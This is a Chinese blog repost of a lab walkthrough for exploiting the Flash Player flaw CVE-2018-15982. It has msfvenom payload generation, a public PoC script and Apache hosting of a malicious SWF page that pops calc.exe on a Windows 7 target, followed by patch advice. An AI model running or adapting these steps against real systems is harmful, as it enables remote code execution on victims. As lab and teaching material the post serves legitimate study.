CVE-2018-15982 简单利用
2019-11-20 11:08:25 Author: mp.weixin.qq.com(查看原文) 阅读量:83 收藏

Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。

一、环境准备
攻击机:kali                               IP:192.168.60.129
靶   机:windows 7                       IP:192.168.60.130
漏洞编号“CVE-2018-15982” 

二、实施如下
Kali 配置相关攻击命令:

下载POC
git clone https://github.com/Ridter/CVE-2018-15982_EXP

生成payload文件并放在poc同目录下
msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin
msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin

执行poc生成视频和网页文件
python CVE_2018_15982.py -i 86.bin -I 64.bin

开启apache服务并将生成的文件复制到web目录下
service apache2 start
cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf

win7操作:
访问http://192.168.60.129/index.html,弹出计算机即远程代码执行成功

三、影响版本:
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108

四、修补建议:
1、Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新,修复了CVE-2018-15982漏洞。
2、不要打开陌生人提供的网页链接和office文档,都可能内嵌恶意flash文件从而执行远程代码。
3、保持系统和杀毒软件处于最新版本。

五、补丁下载
下载地址:
https://www.flash.cn/


注:本工具不得用于商业用途,仅做学习交流,一切后果自行承担。


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&amp;mid=2650458093&amp;idx=3&amp;sn=296c3f65584e62146d5fb76103cfdd54&amp;chksm=83bba209b4cc2b1f5111d8c0972906323276e1b10a23d9476c6d5fe7852d1a6c7cf7164561ae#rd
如有侵权请联系:admin#unsafe.sh